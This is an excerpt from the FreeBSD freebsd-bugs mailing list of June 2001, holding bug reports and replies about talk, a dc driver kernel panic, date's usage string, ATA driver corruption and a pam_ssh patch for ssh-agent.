From: Dima Dorfman To: sebster@sebster.com Cc: FreeBSD-gnats-submit@freebsd.org Subject: Re: bin/27972: talk feature Date: Fri, 08 Jun 2001 21:37:24 -0700 sebster@sebster.com writes: > > >Number: 27972 > >Category: bin > >Synopsis: losing information with talk > >Description: > Using the talk utility it is possible to communicate to other users, however > if they have something to say that is longer than your buffer you lose the > information without any way to check what was said. > >How-To-Repeat: > Say a lot to somebody in a talk window in a short amount of time. > >Fix: > A very simple fix which would make talk about 1000 times more convenient > (IMHO) would be to flip the windows: put "me" in the bottom, and "him" in > the top window. That way, whether you are on the console or in an xterm, > you can scroll back to see what the other person said. In general, I like this, and the second patch you posted looks good upon visual inspection. I haven't had time to investigate it further, but already have a few questions: * Did you actually test that doing this will allow you to scroll up and see your party's messages? I haven't tested it myself, but have an eerie feeling that it may not work. * What do you think of making this new behavior conditional on a command-line option? Some people may not care for this (e.g., they only use talk for one or two line communications), but may get annoyed at the sudden change of orientation. Thanks, Dima Dorfman dima@unixfreak.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 23: 0:12 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C4C8D37B403 for ; Fri, 8 Jun 2001 23:00:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f59601418229; Fri, 8 Jun 2001 23:00:01 -0700 (PDT) (envelope-from gnats) Received: from wantadilla.lemis.com (wantadilla.lemis.com [192.109.197.80]) by hub.freebsd.org (Postfix) with ESMTP id 6ADB237B401 for ; Fri, 8 Jun 2001 22:52:37 -0700 (PDT) (envelope-from grog@lemis.com) Received: by wantadilla.lemis.com (Postfix, from userid 1004) id A1A9D6ACC0; Sat, 9 Jun 2001 15:22:34 +0930 (CST) Message-Id: <20010609055234.A1A9D6ACC0@wantadilla.lemis.com> Date: Sat, 9 Jun 2001 15:22:34 +0930 (CST) From: grog@lemis.com Reply-To: grog@lemis.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/27985: Recent -STABLE crashes when accessing dc device Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27985 >Category: kern >Synopsis: Recent -STABLE crashes when accessing dc device >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Jun 08 23:00:01 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Greg Lehey >Release: FreeBSD 4.3-STABLE i386 >Organization: LEMIS, PO Box 460, Echunga SA 5153, Australia >Environment: ASUS BP6 SMP motherboard, twin Celeron CPUs, Macronix Ethernet card. Jun 9 14:11:09 daemon /kernel: dc0: port 0xd400-0xd4ff mem 0xea000000-0xea0000ff irq 9 at device 13.0 on pci0 Jun 9 14:11:09 daemon /kernel: dc0: Ethernet address: 00:80:c6:f9:a9:37 Jun 9 14:11:09 daemon /kernel: miibus0: on dc0 Jun 9 14:11:09 daemon /kernel: dcphy0: on miibus0 Jun 9 14:11:09 daemon /kernel: dcphy0: 10baseT, 10baseT-FDX, 100baseTX, 100baseTX-FDX, auto >Description: Since about mid-May, any attempt to access the Macronix card causes an immediate panic: #2 0xc016a24d in panic (fmt=0xc02a4134 "from debugger") at ../../kern/kern_shutdown.c:556 #3 0xc0134ce9 in db_panic (addr=-1069998347, have_addr=0, count=1, modif=0xcaddcbec "") at ../../ddb/db_command.c:433 #4 0xc0134c89 in db_command (last_cmdp=0xc02e0360, cmd_table=0xc02e01c0, aux_cmd_tablep=0xc03040d8) at ../../ddb/db_command.c:333 #5 0xc0134d4e in db_command_loop () at ../../ddb/db_command.c:455 #6 0xc0136e63 in db_trap (type=12, code=0) at ../../ddb/db_trap.c:71 #7 0xc0274151 in kdb_trap (type=12, code=0, regs=0xcaddcd48) at ../../i386/i386/db_interface.c:158 #8 0xc028a10e in trap_fatal (frame=0xcaddcd48, eva=8) at ../../i386/i386/trap.c:946 #9 0xc0289da5 in trap_pfault (frame=0xcaddcd48, usermode=0, eva=8) at ../../i386/i386/trap.c:844 #10 0xc02898cf in trap (frame={tf_fs = -1072168936, tf_es = -1070530544, tf_ds = -1072300016, tf_edi = -1054738304, tf_esi = -1054738240, tf_ebp = -891433576, tf_isp = -891433612, tf_ebx = -1054699520, tf_edx = 0, tf_ecx = -891433441, tf_eax = -1054699520, tf_trapno = 12, tf_err = 0, tf_eip = -1069998347, tf_cs = 8, tf_eflags = 66118, tf_esp = -1054738304, tf_ss = -1054738240}) at ../../i386/i386/trap.c:443 #11 0xc0391ef5 in ?? () #12 0xc0149159 in mii_pollstat (mii=0xc121f8c0) at ../../dev/mii/mii.c:328 #13 0xc020aa01 in dc_ifmedia_sts (ifp=0xc1229000, ifmr=0xcaddcea8) at ../../pci/if_dc.c:3053 #14 0xc01b06d5 in ifmedia_ioctl (ifp=0xc1229000, ifr=0xcaddcea8, ifm=0xc121f8c0, cmd=3223873848) at ../../net/if_media.c:281 #15 0xc020ab77 in dc_ioctl (ifp=0xc1229000, command=3223873848, data=0xcaddcea8 "dc0") at ../../pci/if_dc.c:3115 #16 0xc01aef06 in ifioctl (so=0xc9cd9f00, cmd=3223873848, data=0xcaddcea8 "dc0", p=0xca3bfba0) at ../../net/if.c:918 #17 0xc017bbb2 in soo_ioctl (fp=0xc131ddc0, cmd=3223873848, data=0xcaddcea8 "dc0", p=0xca3bfba0) at ../../kern/sys_socket.c:143 #18 0xc01789d6 in ioctl (p=0xca3bfba0, uap=0xcaddcf80) at ../../sys/file.h:177 #19 0xc028a465 in syscall2 (frame={tf_fs = 47, tf_es = 47, tf_ds = 47, tf_edi = -1077940452, tf_esi = 3, tf_ebp = -1077940452, tf_isp = -891433004, tf_ebx = -1077940492, tf_edx = 0, tf_ecx = -1077940476, tf_eax = 54, tf_trapno = 12, tf_err = 2, tf_eip = 134529672, tf_cs = 31, tf_eflags = 663, tf_esp = -1077940560, tf_ss = 47}) at ../../i386/i386/trap.c:1150 #20 0xc0274b1b in Xint0x80_syscall () This example was prompted simply by running ifconfig with no arguments. This problem appears to have been introduced in mid-May. A kernel from early May works fine. -CURRENT kernels work fine. Looking at the likely culprit, (kgdb) f 12 #12 0xc0149159 in mii_pollstat (mii=0xc121f8c0) at ../../dev/mii/mii.c:328 328 (void) (*child->mii_service)(child, mii, MII_POLLSTAT); (kgdb) p *child cannot read proc at 0 (kgdb) p child $1 = (struct mii_softc *) 0x67000292 *** look at that address. Where did it come from? (kgdb) p *mii $2 = { mii_media = { ifm_mask = -268435456, ifm_media = 0, ifm_cur = 0x0, ifm_list = { lh_first = 0xc072a440 }, ifm_change = 0xc020a990 , ifm_status = 0xc020a9e0 }, mii_ifp = 0xc1229000, mii_phys = { lh_first = 0xc121f880 }, mii_instance = 1, mii_media_status = 0, mii_media_active = 2, mii_readreg = 0, mii_writereg = 0, mii_statchg = 0 } (kgdb) p *mii->mii_phys->lh_first $4 = { mii_dev = 0xc1224800, mii_list = { le_next = 0x0, le_prev = 0xc121f8dc }, mii_phy = 31, mii_inst = 0, mii_service = 0xc0391eb4, mii_pdata = 0xc121f8c0, mii_auto_ch = { callout = 0x0 }, mii_flags = 1, mii_capabilities = 30728, mii_ticks = 0, mii_active = 0 } (kgdb) *** This linkage looks correct. There would appear to be only one child, and the address is at least valid. Where did the incorrect value in child come from? Maybe it was frame 11, which appears to have a valid address for the service routine. About here my lack of understanding of the code cuts in, so I'll hope that somebody else can analyse further. >How-To-Repeat: Build a -STABLE kernel. Insert a Macronix card. Run ifconfig. Watch the fireworks. >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 23:10:10 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2A53C37B406 for ; Fri, 8 Jun 2001 23:10:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f596A1l21382; Fri, 8 Jun 2001 23:10:01 -0700 (PDT) (envelope-from gnats) Received: from mail.noos.fr (racine.noos.net [212.198.2.71]) by hub.freebsd.org (Postfix) with ESMTP id 93A1537B405 for ; Fri, 8 Jun 2001 23:01:06 -0700 (PDT) (envelope-from root@gits.dyndns.org) Received: (qmail 36491730 invoked by uid 0); 9 Jun 2001 06:01:04 -0000 Received: from d081.dhcp212-198-228.noos.fr (HELO gits.dyndns.org) ([212.198.228.81]) (envelope-sender ) by racine.noos.net (qmail-ldap-1.03) with DES-CBC3-SHA encrypted SMTP for ; 9 Jun 2001 06:01:04 -0000 Received: (from root@localhost) by gits.dyndns.org (8.11.3/8.11.3) id f59612o96801; Sat, 9 Jun 2001 08:01:03 +0200 (CEST) (envelope-from root) Message-Id: <200106090601.f59612o96801@gits.dyndns.org> Date: Sat, 9 Jun 2001 08:01:03 +0200 (CEST) From: Cyrille Lefevre Reply-To: clefevre@redirect.to To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.113 Subject: bin/27986: date usage string is missing -j Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27986 >Category: bin >Synopsis: date usage string is missing -j >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Jun 08 23:10:00 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Cyrille Lefevre >Release: FreeBSD 4.3-STABLE i386 >Organization: ACME >Environment: System: FreeBSD gits 4.3-STABLE FreeBSD 4.3-STABLE #26: Wed May 23 12:46:38 CEST 2001 root@gits:/disk2/4.x-stable/src/sys/compile/CUSTOM i386 >Description: all is in the subject. >How-To-Repeat: man date date -? >Fix: Index: date.c =================================================================== RCS file: /home/ncvs/src/bin/date/date.c,v retrieving revision 1.32.2.4 diff -u -r1.32.2.4 date.c --- date.c 2001/05/20 11:45:36 1.32.2.4 +++ date.c 2001/06/09 05:57:36 @@ -303,7 +303,7 @@ usage() { (void)fprintf(stderr, "%s\n%s\n", - "usage: date [-nu] [-d dst] [-r seconds] [-t west] " + "usage: date [-jnu] [-d dst] [-r seconds] [-t west] " "[-v[+|-]val[ymwdHMS]] ... ", " " "[-f fmt date | [[[[[cc]yy]mm]dd]HH]MM[.ss]] [+format]"); >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 23:10:13 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 40EB137B405 for ; Fri, 8 Jun 2001 23:10:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f596A3c21389; Fri, 8 Jun 2001 23:10:03 -0700 (PDT) (envelope-from gnats) Date: Fri, 8 Jun 2001 23:10:03 -0700 (PDT) Message-Id: <200106090610.f596A3c21389@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "CS Reddy" Subject: Re: i386/27456: FreeBSD 4.X broken at Hardware Intel Ether Express Pro 10/100B Ethernet Adapter Reply-To: "CS Reddy" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR i386/27456; it has been noted by GNATS. From: "CS Reddy" To: Cc: Subject: Re: i386/27456: FreeBSD 4.X broken at Hardware Intel Ether Express Pro 10/100B Ethernet Adapter Date: Fri, 8 Jun 2001 23:08:51 -0700 This is a multi-part message in MIME format. ------=_NextPart_000_0003_01C0F06F.FB7663D0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Looks like it was my Win Modem causing the problem. I was able to = install FreeBSD 4.3 after I removed my Win Modem. My Intel Ether Express = Card was detected properly and I don't have any problems now. This case may be considered closed. Thanks ------=_NextPart_000_0003_01C0F06F.FB7663D0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Looks like it was my Win Modem causing = the problem.=20 I was able to install FreeBSD 4.3 after I removed my Win Modem. My Intel = Ether=20 Express Card was detected properly and I don't have any problems=20 now.
 
This case may be considered = closed.
 
Thanks
------=_NextPart_000_0003_01C0F06F.FB7663D0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 23:14:24 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C2AA737B403; Fri, 8 Jun 2001 23:14:22 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f596EMI21713; Fri, 8 Jun 2001 23:14:22 -0700 (PDT) (envelope-from dd) Date: Fri, 8 Jun 2001 23:14:22 -0700 (PDT) From: Message-Id: <200106090614.f596EMI21713@freefall.freebsd.org> To: clefevre@redirect.to, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org, dd@FreeBSD.org Subject: Re: bin/27986: date usage string is missing -j Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: date usage string is missing -j State-Changed-From-To: open->analyzed State-Changed-By: dd State-Changed-When: Fri Jun 8 23:14:10 PDT 2001 State-Changed-Why: Committed, thanks! Responsible-Changed-From-To: freebsd-bugs->dd Responsible-Changed-By: dd Responsible-Changed-When: Fri Jun 8 23:14:10 PDT 2001 Responsible-Changed-Why: My MFC reminder. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27986 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 23:14:55 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4E45C37B405; Fri, 8 Jun 2001 23:14:54 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f596EsW21853; Fri, 8 Jun 2001 23:14:54 -0700 (PDT) (envelope-from dd) Date: Fri, 8 Jun 2001 23:14:54 -0700 (PDT) From: Message-Id: <200106090614.f596EsW21853@freefall.freebsd.org> To: creddy@qwest.net, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/27456: FreeBSD 4.X broken at Hardware Intel Ether Express Pro 10/100B Ethernet Adapter Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: FreeBSD 4.X broken at Hardware Intel Ether Express Pro 10/100B Ethernet Adapter State-Changed-From-To: open->closed State-Changed-By: dd State-Changed-When: Fri Jun 8 23:14:46 PDT 2001 State-Changed-Why: Requested by originator. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27456 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 4:10: 9 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C354F37B401 for ; Sat, 9 Jun 2001 04:10:05 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f59BA5O57681; Sat, 9 Jun 2001 04:10:05 -0700 (PDT) (envelope-from gnats) Date: Sat, 9 Jun 2001 04:10:05 -0700 (PDT) Message-Id: <200106091110.f59BA5O57681@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Ruslan Ermilov Subject: Re: bin/27972: talk feature Reply-To: Ruslan Ermilov Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/27972; it has been noted by GNATS. From: Ruslan Ermilov To: Dima Dorfman Cc: bug-followup@FreeBSD.org Subject: Re: bin/27972: talk feature Date: Sat, 9 Jun 2001 14:00:29 +0300 On Fri, Jun 08, 2001 at 09:40:03PM -0700, Dima Dorfman wrote: > The following reply was made to PR bin/27972; it has been noted by GNATS. > > From: Dima Dorfman > To: sebster@sebster.com > Cc: FreeBSD-gnats-submit@freebsd.org > Subject: Re: bin/27972: talk feature > Date: Fri, 08 Jun 2001 21:37:24 -0700 > > sebster@sebster.com writes: > > > > >Number: 27972 > > >Category: bin > > >Synopsis: losing information with talk > > >Description: > > Using the talk utility it is possible to communicate to other users, however > > if they have something to say that is longer than your buffer you lose the > > information without any way to check what was said. > > >How-To-Repeat: > > Say a lot to somebody in a talk window in a short amount of time. > > >Fix: > > A very simple fix which would make talk about 1000 times more convenient > > (IMHO) would be to flip the windows: put "me" in the bottom, and "him" in > > the top window. That way, whether you are on the console or in an xterm, > > you can scroll back to see what the other person said. > > In general, I like this, and the second patch you posted looks good > upon visual inspection. I haven't had time to investigate it further, > but already have a few questions: > > * Did you actually test that doing this will allow you to scroll up > and see your party's messages? I haven't tested it myself, but have > an eerie feeling that it may not work. > It doesn't work here, unfortunately, at least on a text VTY conversation. > * What do you think of making this new behavior conditional on a > command-line option? Some people may not care for this (e.g., they > only use talk for one or two line communications), but may get annoyed > at the sudden change of orientation. > I think this could be accomplished by putting the other's party address from which the response (if we initiated a call) was made. Cheers, -- Ruslan Ermilov Oracle Developer/DBA, ru@sunbay.com Sunbay Software AG, ru@FreeBSD.org FreeBSD committer, +380.652.512.251 Simferopol, Ukraine http://www.FreeBSD.org The Power To Serve http://www.oracle.com Enabling The Information Age To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 5:50: 7 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DFA8C37B403 for ; Sat, 9 Jun 2001 05:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f59Co1O68707; Sat, 9 Jun 2001 05:50:01 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7F90037B401 for ; Sat, 9 Jun 2001 05:46:42 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f59Ckg168423; Sat, 9 Jun 2001 05:46:42 -0700 (PDT) (envelope-from nobody) Message-Id: <200106091246.f59Ckg168423@freefall.freebsd.org> Date: Sat, 9 Jun 2001 05:46:42 -0700 (PDT) From: feh@fehcom.de To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/27987: New ATA Driver failure with VIA Southbridge VT82686A Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27987 >Category: kern >Synopsis: New ATA Driver failure with VIA Southbridge VT82686A >Confidential: no >Severity: critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Jun 09 05:50:01 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Erwin Hoffmann >Release: 4.1, 4.2, 4.3 >Organization: FEHCom >Environment: (Can't do it!) >Description: I am currently running FreeBSD 3.5.1 on a Gericom NB with AMD K6-2/500 196 MB RAM, VIA integrated chipset (Trident Cyber Blade etc.). Disc is Toshiba MK6015MAP (6 GB). In an attempt to upgrade to 4.1/4.2/4.3 I harvest a complete desaster: - The installation succeeds with some write failures. - After the first reboot the file system is "mangeled" and the system starts with a default shell, since even /etc/fstab is not evaluated. - Strange enough, some parts of /bin, /sbin, /usr/.. are intact thus some command work. - No chance to fix it manually via fsck - to many failures (like (double used inodes etc.). - The NB works fine with WinNT and FreeBSD 3.5.1. - Pls. remember: The VIA Southbridge VT82686A (Rev. 0x06) is not the VT82686_B_. - The problem is independent whether I raise on the BSD slices more filesystems (eg. /, /usr,..). Currently I have simply a swap and a /. >How-To-Repeat: Simply reinstall 4.x on that Notebook. >Fix: Simply stay with the old ATA-Drivers/FreeBSD Release. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 7:30:10 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8119337B405 for ; Sat, 9 Jun 2001 07:30:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f59EU1i84067; Sat, 9 Jun 2001 07:30:01 -0700 (PDT) (envelope-from gnats) Received: from keyser.soze.com (keyser.soze.com [194.165.93.196]) by hub.freebsd.org (Postfix) with ESMTP id F3BF137B401; Sat, 9 Jun 2001 07:27:30 -0700 (PDT) (envelope-from ruben@verweg.com) Received: from erg.verweg.com ([132.229.90.89]) by keyser.soze.com (8.9.1/8.9.1) with ESMTP id QAA17098; Sat, 9 Jun 2001 16:24:18 +0200 (CEST) Received: (from ruben@localhost) by erg.verweg.com (8.9.3+3.2W/8.9.3) id QAA18537; Sat, 9 Jun 2001 16:27:28 +0200 (CEST) Message-Id: <20010609162726.A18504@erg.verweg.com> Date: Sat, 9 Jun 2001 16:27:27 +0200 From: ruben@verweg.com Reply-To: ruben@verweg.com To: FreeBSD-gnats-submit@freebsd.org Cc: green@freebsd.org X-Send-Pr-Version: 3.113 Subject: bin/27988: [PATCH] let pam_ssh.so session work (with xdm) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27988 >Category: bin >Synopsis: [PATCH] let pam_ssh.so explicitly start ssh-agent with bourne >Confidential: no >Severity: serious >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Jun 09 07:30:01 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Ruben van Staveren >Release: FreeBSD 4.3-STABLE i386 >Organization: Verweg dot Com >Environment: System: FreeBSD helium.verweg.com 4.3-STABLE FreeBSD 4.3-STABLE #0: Wed May 30 15:17:54 CEST 2001 root@helium.verweg.com:/usr/obj/usr/cvsup/4.0-stable/src/sys/HELIUM i386 >Description: The pam_ssh module has the possibility to start ssh-agent for you, making a single logon possible by directly feeding your passphrase into the agent (obtained during the authentification phase) However, ssh-agent has the habit on my system to present its output in C shell format whereas pam_ssh expects it to be in Bourne shell format (pam_ssh.c, lines 397-409) This does not affect the auth capability, only the session phase. >How-To-Repeat: Use pam_ssh.so as a session and auth module for xdm in /etc/pam.conf and observe the contents of the ~/.ssh/agent-* file after logon the following syslog messages also apply: Jun 9 13:19:47 helium -:0 : pam_ssh: could not connect to agent Jun 9 14:45:11 helium -:0 : pam_ssh: /usr/bin/ssh-agent -k exited with status 1 >Fix: Instead of tinkering with the parsing, or changing user shells and or the way xdm is started, let pam_ssh.so explicitly start ssh-agent to output Bourne shell syntax. Here's a patch. --- src/crypto/openssh/pam_ssh/pam_ssh.c.orig Sat Jun 9 15:46:44 2001 +++ src/crypto/openssh/pam_ssh/pam_ssh.c Sat Jun 9 15:46:53 2001 @@ -373,7 +373,7 @@ saved_uid = geteuid(); (void)seteuid(pwent->pw_uid); env_fp = fopen(env_file, "w"); - pipe = popen(PATH_SSH_AGENT, "r"); + pipe = popen(PATH_SSH_AGENT " -s", "r"); (void)seteuid(saved_uid); if (!pipe) { syslog(LOG_ERR, "%s: %s: %m", MODULE_NAME, PATH_SSH_AGENT); >Release-Note: >Audit-Trail: >Unformatted: >shell To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 8:40: 9 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3307237B403 for ; Sat, 9 Jun 2001 08:40:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f59Fe3f91611; Sat, 9 Jun 2001 08:40:03 -0700 (PDT) (envelope-from gnats) Date: Sat, 9 Jun 2001 08:40:03 -0700 (PDT) Message-Id: <200106091540.f59Fe3f91611@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Søren Schmidt Subject: Re: kern/27987: New ATA Driver failure with VIA Southbridge VT82686A Reply-To: Søren Schmidt Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/27987; it has been noted by GNATS. From: Søren Schmidt To: feh@fehcom.de Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: kern/27987: New ATA Driver failure with VIA Southbridge VT82686A Date: Sat, 9 Jun 2001 17:33:14 +0200 (CEST) It seems feh@fehcom.de wrote: > > >Number: 27987 > >Category: kern > >Synopsis: New ATA Driver failure with VIA Southbridge VT82686A > >Confidential: no > >Severity: critical > >Priority: medium > >Responsible: freebsd-bugs > >State: open > >Quarter: > >Keywords: > >Date-Required: > >Class: sw-bug > >Submitter-Id: current-users > >Arrival-Date: Sat Jun 09 05:50:01 PDT 2001 > >Closed-Date: > >Last-Modified: > >Originator: Erwin Hoffmann > >Release: 4.1, 4.2, 4.3 > >Organization: > FEHCom > >Environment: > (Can't do it!) > >Description: > I am currently running FreeBSD 3.5.1 on a Gericom NB with AMD K6-2/500 > 196 MB RAM, VIA integrated chipset (Trident Cyber Blade etc.). Disc is > Toshiba MK6015MAP (6 GB). > In an attempt to upgrade to 4.1/4.2/4.3 I harvest a complete desaster: > > - The installation succeeds with some write failures. > - After the first reboot the file system is "mangeled" and the system > starts with a default shell, since even /etc/fstab is not evaluated. > - Strange enough, some parts of /bin, /sbin, /usr/.. are intact thus some > command work. > - No chance to fix it manually via fsck - to many failures (like > (double used inodes etc.). > - The NB works fine with WinNT and FreeBSD 3.5.1. > - Pls. remember: The VIA Southbridge VT82686A (Rev. 0x06) is not the > VT82686_B_. > - The problem is independent whether I raise on the BSD slices more > filesystems (eg. /, /usr,..). Currently I have simply a swap and a /. Hmm, the '686A is supported in 4.3 so thats not the problem, you should try to disable DMA on 4.3 and see if that solves the problem. -Søren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 9:30:10 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4EB6737B403 for ; Sat, 9 Jun 2001 09:30:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f59GU1o97691; Sat, 9 Jun 2001 09:30:01 -0700 (PDT) (envelope-from gnats) Received: from scientia.demon.co.uk (scientia.demon.co.uk [212.228.14.13]) by hub.freebsd.org (Postfix) with ESMTP id B1E8837B401 for ; Sat, 9 Jun 2001 09:27:40 -0700 (PDT) (envelope-from ben@scientia.demon.co.uk) Received: from platinum.shef.vinosystems.com ([192.168.91.37] ident=root) by scientia.demon.co.uk with esmtp (Exim 3.22 #1) id 158laM-0000pw-00 for FreeBSD-gnats-submit@freebsd.org; Sat, 09 Jun 2001 17:27:38 +0100 Received: (from ben@localhost) by platinum.shef.vinosystems.com (8.11.3/8.11.3) id f59GRch80702; Sat, 9 Jun 2001 17:27:38 +0100 (BST) (envelope-from ben) Message-Id: <200106091627.f59GRch80702@platinum.shef.vinosystems.com> Date: Sat, 9 Jun 2001 17:27:38 +0100 (BST) From: ben@FreeBSD.org To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/27990: ypbind uses memory after freeing it Sender: owner-freebsd-bugs@FreeBSD.ORG 